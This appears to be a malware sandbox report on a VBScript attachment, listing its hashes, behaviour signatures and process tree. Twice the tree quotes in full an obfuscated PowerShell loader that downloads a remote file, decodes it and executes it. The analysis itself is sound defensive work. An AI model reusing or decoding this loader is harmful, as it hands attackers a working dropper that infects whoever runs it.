Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

7

Static

static

1

Attachment.vbs

windows7-x64

1

Attachment.vbs

windows10-2004-x64

7

Analysis

  • max time kernel
    145s
  • max time network
    150s
  • platform
    windows7_x64
  • resource
    win7-20230831-en
  • resource tags

    arch:x64arch:x86image:win7-20230831-enlocale:en-usos:windows7-x64system
  • submitted
    05/10/2023, 08:54

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Attachment.vbs

  • Size

    33KB

  • MD5

    2bc4aca6380a7b1833dd3c892a21b225

  • SHA1

    16f788f930196018f98738c32cadfd2aac8eee2b

  • SHA256

    e20c1f3e05a778a3ef777cacd388c0fc2a9d22129dc7993c413871693536730c

  • SHA512

    dc7bb838d627ea7dc27d01fcddff2a38d625d0e781c550d603e05d37791a499b11c6ed1a4ae6382aed2968934e4c3167e7c731107a70a14ebef705b68dfb0248

  • SSDEEP

    768:RPJkLxR+FwpIlY2YalfZeoAg3Lh7uDFsV+oCh:wRsw+5J+FA+t

Score
1/10

Malware Config

Signatures

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 7 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Attachment.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1864
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "Function naturfa9 ([String]$Skelnemr){$Filmafte = $Skelnemr.Length;For($Fyrigerab=4; $Fyrigerab -lt $Filmafte-1; $Fyrigerab+=(4+1)){$Monopo=$Monopo+$Skelnemr.Substring( $Fyrigerab, 1)};$Monopo;}$Antifebr=naturfa9 'Alumhlokut FlatKontpFing:nons/Hand/VulsmAlliiPrelsSammsVokse mulnDiscdPreue EftnMixorTakaaConsiAbonlValuwAnstaJvnfy ReimJakkoTsardtuareContlkanelnonae IntrUnfasPipe.MadooUnrerSkbngInte.PaanuPreokProt/KandtadreeSpecsTriftPleu/UltrGBjveeTokamZoopm HaboserilInstoPert.CalllIngez HomhCyto ';$Forbin=$Antifebr.split([char]62);$Antifebr=$Forbin[0];$Monopo01=naturfa9 ' ThaiStike MeaxBroc ';$Tacklingsl = naturfa9 'Alum\Comps BauyConssBranwGaraoMarxw Neu6Euka4Drap\ChacWDataiPromnUbefd EsooTampwBomhsSangPOuthodougwLamee NonrAbriSTernhSpote DejlFodflProc\ IndvUnch1Mode.Nord0 Reg\BjerpInteoRancwDekaeOblirSkidsBkkeh grnePtyalMisclNile.AgiteGenexTalle Sdv ';.($Monopo01) (naturfa9 ' Fdr$ DisCCoproSkatmTelebHospaPosttKlart maleSpumdDebaeCape2Inha=Arti$Undee Tezn SisvRote:ElutwUncoi TernIncodforsiDuegrBarm ') ;.($Monopo01) (naturfa9 ' Duf$UdmeTKatiaGnubcPholkhyldlTrykiBefanStikgGravsUdlal Vil= Sto$CardC SopoBloomAutubAldraStiptbesytDuckeFyredPolyeProg2Syke+Skvi$KogeTheksasolicOsirk PoclFriti ChlnCilig Brds PoslChem ') ;.($Monopo01) (naturfa9 'Over$PirrSNeurnRureo BarrSaldtRest Orth=Tram Aga(Deco(SamignicawMismmBigliHemi TrkwAfskiAntinSkin3 Thi2 Bre_ BilpSursrSpinoBraicTunneEminsRetosSple Hirs-ByscFammo SmoPPianrBoploShamcPengePosisArtisMaleIBilldPoly=Mede$ Tab{UnsaPStyrIDiskDBile}Apos)Crit.EndeCRteboBigbmspotmkollaTripnMicrdmultLFisciWlitnFremeLife)Mazu Nume-BlgesStorp Totl EmbiPentt dec Fory[MetrcSymphRegnaOpalrGran] Tir3Befu4Skvi ');.($Monopo01) (naturfa9 'Macc$JgerTCrimiSkablUnflhlogay Mell KarlUldgePant Pikn=tils Corb$ SkrSPoacnReproEducrdrupt Dyb[Twif$SpilSCheinfagao BenrGuartOper.ForscSemioMangu AntnIdentVide-Bygg2Hajj]ster ');.($Monopo01) (naturfa9 ' Cam$KensRIdereRodoj TaleDetehDermoHelapMagnpSpeceJann= Val(MediTStageUgleslaastOver-SektP HesaDisptAfghhFutt Uta$SandTModea ForcDivikTraplPatei SornPelfgHjtisSkinlKeno)Efte Doku- ChiA DifnTextdlanc sua(Uper[ EmuI EsknStrut EnoPBardtUnrorGors]Soma:Star:BalasSkriiTranzHandeRoma Skad-LokaeLingqrull Cten8Sels)Vink ') ;if ($Rejehoppe) {.$Tacklingsl $Tilhylle;} else {;$Monopo00=naturfa9 'BittSSkintPlanaBiksr MistMrte-omklB grai PertIndssBurkTsgnerImpea HaanSpirsmodvfSnkeeZygirUnsi Ful-PoleSTrmlo Capu Reor BlgcSubgePlay Nard$ForrAEmbenOutstOphiiTillfSydaeMentbrecorCafe Sili-EquiD IlleKlvesDekotkvajiMiljnLuciaPupptAntaiPakkoCircn Fus Intr$GambCSkoboUvenmDragbGeocaDishtReawtApprePansdskeleRetn2Firl ';.($Monopo01) (naturfa9 'Unge$InhaCNonmodelimUhelbKoveaHelhtGreetUdtaeUnmyd BjeeSlut2Clou=graa$ NapeDephnSkrevVeks:Kania KakpjeffpMoisdEnwha Ekatextoadisk ') ;.($Monopo01) (naturfa9 'JimbI FasmmetopRideoBarbrToletGlov-HazaM PanobrendChaduKontlExtreEpim RrlgBSikkiCardt infsGlabTGeorr AmpaOrganAndesUsrifOstie sprrGnas ') ;$Combattede2=$Combattede2+'\Lgnersla.Jea';.($Monopo01) (naturfa9 ' Gra$CaveT BerrTrkboKonolDentlDisseExtey IncvCouno ReggSemi= Bev(BackTGutteDialsConetNonl-FarvPNavnaMarktTetrhViet Ejer$SlagCEntooGravmAbonbNorraKnaltEyertLselePiazdThroeskab2Stem)Merl ') ;while (-not $Trolleyvog) {.($Monopo01) (naturfa9 'Ripp$ UdrTFastrcitroIllalAfkllLavteCarbyEpifvCocioFerigMoor= Mag(skvaTBedeeUbets FlatRumm-HallPRepea ImmtGdnihEvin Fell$EnkeCTrauo KtemSkabbMonaaSubztSpiltcamaeElegdEucaePhil2Stil)Cirk ') ;.($Monopo01) $Monopo00;.($Monopo01) (naturfa9 ' GraSposttFertaNonkrKugltEksp- CouSContlAnsleOverePrivp Jum Waef5Kome ');$Antifebr=$Forbin[$Ledelshed++%$Forbin.count];}.($Monopo01) (naturfa9 'Eluv$FaminUprea KenthunduSpekrTaljfDevaaOchn Hun=Dess SkamGShare InctIndr-ImprC Lalo thun MaltPaleegettnKodrtSped App$AfvrCHutcoGasfmIchnbMensaHenntPsyktEnkee Attd UdreLeuk2Prel ');.($Monopo01) (naturfa9 'Bedo$OmfoO Tovv Vule Fisr CogwNonchStal Glos= Twi Tref[ DisS DryyProms SnetverdeEglamOrth.SalmCInteoFuchnHonnvHeteeDelerDuentunbe] Ypo:Best:GymnFCongrKompoSammmCookBPoliapenisOpfieClas6 int4BivuSLuxetrecerTykniFrmangunngBobo(Lyco$WeednKompaPufft Patu PisrIntefHomoaLiva) Pro ');.($Monopo01) (naturfa9 'Guld$ sitMfalloFetinNonooEkstpParooIron2Poco Raff=Innu Deca[InvaSMuniyTllesOvertLitueAfspmMobi.PyroTBrofeStikxEleftNeut. TerEbaalnEquic annoFremdRekuiHumpnRelugDrik]Dimm:Fibr:NumbAPatiSKvstC UniIDrgtIDota.PlumGAfsoeGimptUndeSPukltLandr WobigenenGermgGesp(Bryd$ UruOAfsvvMedieChaurDydswCivihDrau)bron ');.($Monopo01) (naturfa9 'Lave$HemaSAgeri FlanBogskBaseeArchr SkilInte=Sats$FlueMKameoAdganInfaoFilspRundofrst2misq.BestsUndeuharvb Vels PretdyskrRicaiBochnTermgOver( van2Ndri5Dete0 Ind1Mmet0Prog8Dyst,Stra2Epic3Frim4Unsa0Reve7Ambr) Fru ');.($Monopo01) $Sinkerl;}"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2268
      • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "Function naturfa9 ([String]$Skelnemr){$Filmafte = $Skelnemr.Length;For($Fyrigerab=4; $Fyrigerab -lt $Filmafte-1; $Fyrigerab+=(4+1)){$Monopo=$Monopo+$Skelnemr.Substring( $Fyrigerab, 1)};$Monopo;}$Antifebr=naturfa9 'Alumhlokut FlatKontpFing:nons/Hand/VulsmAlliiPrelsSammsVokse mulnDiscdPreue EftnMixorTakaaConsiAbonlValuwAnstaJvnfy ReimJakkoTsardtuareContlkanelnonae IntrUnfasPipe.MadooUnrerSkbngInte.PaanuPreokProt/KandtadreeSpecsTriftPleu/UltrGBjveeTokamZoopm HaboserilInstoPert.CalllIngez HomhCyto ';$Forbin=$Antifebr.split([char]62);$Antifebr=$Forbin[0];$Monopo01=naturfa9 ' ThaiStike MeaxBroc ';$Tacklingsl = naturfa9 'Alum\Comps BauyConssBranwGaraoMarxw Neu6Euka4Drap\ChacWDataiPromnUbefd EsooTampwBomhsSangPOuthodougwLamee NonrAbriSTernhSpote DejlFodflProc\ IndvUnch1Mode.Nord0 Reg\BjerpInteoRancwDekaeOblirSkidsBkkeh grnePtyalMisclNile.AgiteGenexTalle Sdv ';.($Monopo01) (naturfa9 ' Fdr$ DisCCoproSkatmTelebHospaPosttKlart maleSpumdDebaeCape2Inha=Arti$Undee Tezn SisvRote:ElutwUncoi TernIncodforsiDuegrBarm ') ;.($Monopo01) (naturfa9 ' Duf$UdmeTKatiaGnubcPholkhyldlTrykiBefanStikgGravsUdlal Vil= Sto$CardC SopoBloomAutubAldraStiptbesytDuckeFyredPolyeProg2Syke+Skvi$KogeTheksasolicOsirk PoclFriti ChlnCilig Brds PoslChem ') ;.($Monopo01) (naturfa9 'Over$PirrSNeurnRureo BarrSaldtRest Orth=Tram Aga(Deco(SamignicawMismmBigliHemi TrkwAfskiAntinSkin3 Thi2 Bre_ BilpSursrSpinoBraicTunneEminsRetosSple Hirs-ByscFammo SmoPPianrBoploShamcPengePosisArtisMaleIBilldPoly=Mede$ Tab{UnsaPStyrIDiskDBile}Apos)Crit.EndeCRteboBigbmspotmkollaTripnMicrdmultLFisciWlitnFremeLife)Mazu Nume-BlgesStorp Totl EmbiPentt dec Fory[MetrcSymphRegnaOpalrGran] Tir3Befu4Skvi ');.($Monopo01) (naturfa9 'Macc$JgerTCrimiSkablUnflhlogay Mell KarlUldgePant Pikn=tils Corb$ SkrSPoacnReproEducrdrupt Dyb[Twif$SpilSCheinfagao BenrGuartOper.ForscSemioMangu AntnIdentVide-Bygg2Hajj]ster ');.($Monopo01) (naturfa9 ' Cam$KensRIdereRodoj TaleDetehDermoHelapMagnpSpeceJann= Val(MediTStageUgleslaastOver-SektP HesaDisptAfghhFutt Uta$SandTModea ForcDivikTraplPatei SornPelfgHjtisSkinlKeno)Efte Doku- ChiA DifnTextdlanc sua(Uper[ EmuI EsknStrut EnoPBardtUnrorGors]Soma:Star:BalasSkriiTranzHandeRoma Skad-LokaeLingqrull Cten8Sels)Vink ') ;if ($Rejehoppe) {.$Tacklingsl $Tilhylle;} else {;$Monopo00=naturfa9 'BittSSkintPlanaBiksr MistMrte-omklB grai PertIndssBurkTsgnerImpea HaanSpirsmodvfSnkeeZygirUnsi Ful-PoleSTrmlo Capu Reor BlgcSubgePlay Nard$ForrAEmbenOutstOphiiTillfSydaeMentbrecorCafe Sili-EquiD IlleKlvesDekotkvajiMiljnLuciaPupptAntaiPakkoCircn Fus Intr$GambCSkoboUvenmDragbGeocaDishtReawtApprePansdskeleRetn2Firl ';.($Monopo01) (naturfa9 'Unge$InhaCNonmodelimUhelbKoveaHelhtGreetUdtaeUnmyd BjeeSlut2Clou=graa$ NapeDephnSkrevVeks:Kania KakpjeffpMoisdEnwha Ekatextoadisk ') ;.($Monopo01) (naturfa9 'JimbI FasmmetopRideoBarbrToletGlov-HazaM PanobrendChaduKontlExtreEpim RrlgBSikkiCardt infsGlabTGeorr AmpaOrganAndesUsrifOstie sprrGnas ') ;$Combattede2=$Combattede2+'\Lgnersla.Jea';.($Monopo01) (naturfa9 ' Gra$CaveT BerrTrkboKonolDentlDisseExtey IncvCouno ReggSemi= Bev(BackTGutteDialsConetNonl-FarvPNavnaMarktTetrhViet Ejer$SlagCEntooGravmAbonbNorraKnaltEyertLselePiazdThroeskab2Stem)Merl ') ;while (-not $Trolleyvog) {.($Monopo01) (naturfa9 'Ripp$ UdrTFastrcitroIllalAfkllLavteCarbyEpifvCocioFerigMoor= Mag(skvaTBedeeUbets FlatRumm-HallPRepea ImmtGdnihEvin Fell$EnkeCTrauo KtemSkabbMonaaSubztSpiltcamaeElegdEucaePhil2Stil)Cirk ') ;.($Monopo01) $Monopo00;.($Monopo01) (naturfa9 ' GraSposttFertaNonkrKugltEksp- CouSContlAnsleOverePrivp Jum Waef5Kome ');$Antifebr=$Forbin[$Ledelshed++%$Forbin.count];}.($Monopo01) (naturfa9 'Eluv$FaminUprea KenthunduSpekrTaljfDevaaOchn Hun=Dess SkamGShare InctIndr-ImprC Lalo thun MaltPaleegettnKodrtSped App$AfvrCHutcoGasfmIchnbMensaHenntPsyktEnkee Attd UdreLeuk2Prel ');.($Monopo01) (naturfa9 'Bedo$OmfoO Tovv Vule Fisr CogwNonchStal Glos= Twi Tref[ DisS DryyProms SnetverdeEglamOrth.SalmCInteoFuchnHonnvHeteeDelerDuentunbe] Ypo:Best:GymnFCongrKompoSammmCookBPoliapenisOpfieClas6 int4BivuSLuxetrecerTykniFrmangunngBobo(Lyco$WeednKompaPufft Patu PisrIntefHomoaLiva) Pro ');.($Monopo01) (naturfa9 'Guld$ sitMfalloFetinNonooEkstpParooIron2Poco Raff=Innu Deca[InvaSMuniyTllesOvertLitueAfspmMobi.PyroTBrofeStikxEleftNeut. TerEbaalnEquic annoFremdRekuiHumpnRelugDrik]Dimm:Fibr:NumbAPatiSKvstC UniIDrgtIDota.PlumGAfsoeGimptUndeSPukltLandr WobigenenGermgGesp(Bryd$ UruOAfsvvMedieChaurDydswCivihDrau)bron ');.($Monopo01) (naturfa9 'Lave$HemaSAgeri FlanBogskBaseeArchr SkilInte=Sats$FlueMKameoAdganInfaoFilspRundofrst2misq.BestsUndeuharvb Vels PretdyskrRicaiBochnTermgOver( van2Ndri5Dete0 Ind1Mmet0Prog8Dyst,Stra2Epic3Frim4Unsa0Reve7Ambr) Fru ');.($Monopo01) $Sinkerl;}"
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2724

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\WH6S0CGHDHSNESG7563F.temp
    Filesize

    7KB

    MD5

    f12a0a8049860664d8d045043c30fd3b

    SHA1

    c12d8b4a1b9cedc7b16e38ee031fce07a3102a75

    SHA256

    65b8a3291a5412a4314516a64a25bd4d050f57ab2d5b69a3b3db183dbb89632e

    SHA512

    3fc6536ec11c9a462ec72b9d0d8355d027d93e5c994620ac25769b691fc5a22093f959a9c8ff38bdfa44f94ec34f54f077e755c541fd8b125fffbfe4091629b8

    Download Submit

  • memory/2268-26-0x000007FEF5690000-0x000007FEF602D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2268-28-0x0000000002A90000-0x0000000002B10000-memory.dmp

    Filesize

    512KB

    Download

  • memory/2268-7-0x0000000002A90000-0x0000000002B10000-memory.dmp

    Filesize

    512KB

    Download

  • memory/2268-8-0x0000000002A90000-0x0000000002B10000-memory.dmp

    Filesize

    512KB

    Download

  • memory/2268-9-0x000007FEF5690000-0x000007FEF602D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2268-5-0x0000000002560000-0x0000000002568000-memory.dmp

    Filesize

    32KB

    Download

  • memory/2268-27-0x0000000002A90000-0x0000000002B10000-memory.dmp

    Filesize

    512KB

    Download

  • memory/2268-4-0x000000001B3E0000-0x000000001B6C2000-memory.dmp

    Filesize

    2.9MB

    Download

  • memory/2268-6-0x000007FEF5690000-0x000007FEF602D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2724-15-0x00000000025E0000-0x0000000002620000-memory.dmp

    Filesize

    256KB

    Download

  • memory/2724-14-0x00000000025E0000-0x0000000002620000-memory.dmp

    Filesize

    256KB

    Download

  • memory/2724-13-0x0000000073300000-0x00000000738AB000-memory.dmp

    Filesize

    5.7MB

    Download

  • memory/2724-12-0x0000000073300000-0x00000000738AB000-memory.dmp

    Filesize

    5.7MB

    Download

  • memory/2724-16-0x00000000025E0000-0x0000000002620000-memory.dmp

    Filesize

    256KB

    Download

  • memory/2724-29-0x0000000073300000-0x00000000738AB000-memory.dmp

    Filesize

    5.7MB

    Download

  • memory/2724-30-0x0000000073300000-0x00000000738AB000-memory.dmp

    Filesize

    5.7MB

    Download

  • memory/2724-31-0x00000000025E0000-0x0000000002620000-memory.dmp

    Filesize

    256KB

    Download